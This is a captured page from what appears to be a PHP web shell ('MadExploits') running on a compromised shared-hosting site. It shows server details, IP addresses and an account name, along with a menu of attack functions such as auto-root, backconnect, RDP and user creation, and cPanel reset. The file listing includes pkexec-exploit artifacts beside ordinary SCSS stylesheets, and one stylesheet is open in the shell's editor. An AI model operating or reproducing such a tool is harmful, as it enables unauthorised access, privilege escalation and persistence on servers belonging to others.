Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_about.scss
1.39
KB
-rw-r--r--
_blog_page.scss
33.44
KB
-rw-r--r--
_bradcam.scss
5.12
KB
-rw-r--r--
_categories.scss
2.8
KB
-rw-r--r--
_color.scss
1.32
KB
-rw-r--r--
_common.scss
15.62
KB
-rw-r--r--
_contact-form.scss
5.92
KB
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.49
KB
-rw-r--r--
_footer.scss
3.83
KB
-rw-r--r--
_h1-hero.scss
5.27
KB
-rw-r--r--
_headerMenu.scss
6.07
KB
-rw-r--r--
_mixins.scss
346
B
-rw-r--r--
_our-info.scss
753
B
-rw-r--r--
_overlay.scss
983
B
-rw-r--r--
_pagination.scss
1.24
KB
-rw-r--r--
_services.scss
560
B
-rw-r--r--
_services_section.scss
0
B
-rw-r--r--
_team.scss
2.38
KB
-rw-r--r--
_testimonial.scss
2.73
KB
-rw-r--r--
_variables.scss
2.61
KB
-rw-r--r--
style.scss
931
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _headerMenu.scss
// Header left right padding .header-area { .header-bottom{ // mobile menu show @media #{$md}{ padding: 15px 0px; } @media #{$sm}{ padding: 15px 0px; } @media #{$xs}{ padding: 15px 0px; } } } .header-area { background: #000c20; // Header Top @media #{$md}{ box-shadow: 0 10px 15px rgba(25, 25, 25, 0.1); } @media #{$sm}{ box-shadow: 0 10px 15px rgba(25, 25, 25, 0.1); } @media #{$xs}{ box-shadow: 0 10px 15px rgba(25, 25, 25, 0.1); } .header-top{ border-bottom: 1px solid #2d2d2d; padding: 9px 0px; .header-info-left{ ul{ li{ color: #7b8693; display: inline-block; margin-right: 70px; font-size: 14px; &:last-child{ margin-right: 0px; } & i{ margin-right: 8px; } } } } .header-info-right{ .header-social{ li{ display: inline-block; & a{ color:#7b8693; font-size: 14px; padding-left: 25px; &:hover{ color: $theme-color; } } } } } } } // Header Bottom .main-header{ position: relative; z-index: 3; .main-menu{ @media #{$laptop}{ margin-right: 30px; } & ul{ & li{ display: inline-block; position: relative; z-index: 1; & a{ color: #fff; font-weight: 400; padding: 39px 19px; display: block; font-size: 16px; @include transition(.3s); text-transform: capitalize; @media #{$lg}{ padding: 39px 14px } } &:hover{ & > a{ color:$theme-color; } } } & ul.submenu{ position: absolute; width: 170px; background: rgba(0, 12, 32,.8); left: 0; top: 90%; visibility: hidden; opacity: 0; box-shadow: 0 0 10px 3px rgba(0, 0, 0, 0.05); padding: 17px 0; border-top: 5px solid $theme-color; @include transition(.3s); & > li{ margin-left: 7px; display: block; & > a{ padding: 6px 10px !important; font-size: 16px; color: #fdfdfd; &:hover{ color:$theme-color; background: none; padding-left: 13px !important; } & i{ // @include transition(.4s); } } } } } } } // Hover Show Sub-menu .main-header ul > li:hover > ul.submenu { visibility: visible; opacity: 1; top: 100%; } .header-transparent { position: absolute; top: 0; right: 0; left: 0; z-index: 9; } // Social Icon Effect .header-area { .header-top { .header-info-right{ .header-social { a{ i { @include transition(.4s); transform: rotateY(0deg); -webkit-transform: rotateY(0deg); -moz-transform: rotateY(0deg); -ms-transform: rotateY(0deg); -o-transform: rotateY(0deg); } // Hover &:hover i { transform: rotateY(180deg); -webkit-transform: rotateY(180deg); -moz-transform: rotateY(180deg); -ms-transform: rotateY(180deg); -o-transform: rotateY(180deg); } } } } } } //! header Sticky & Responsive .header-sticky{ &.sticky-bar{ background: rgb(0, 0, 0); &.sticky { .main-menu{ ul { li{ a { padding: 20px 20px !important; } } } } // Small device sticky show padding @media #{$md}{ padding: 15px 0px; } @media #{$sm}{ padding: 15px 0px; } @media #{$xs}{ padding: 15px 0px; } } } } //! Mobile Menu .mobile_menu { position: absolute; right: 0px; width: 100%; z-index: 99; .slicknav_menu { background: transparent; margin-top: 0px !important; .slicknav_btn { top: -34px; // mobile Menu button color .slicknav_icon-bar { background-color: $theme-color !important; } } .slicknav_nav{ margin-top: 9px !important; box-shadow: 0 0 10px 3px rgba(141, 140, 140, 0.5); a:hover { background: transparent; color: $theme-color; } a { font-size: 15px; padding: 7px 10px; } // Dropdown Menu button Padding None .slicknav_item a { padding: 0 !important; } } } }
Close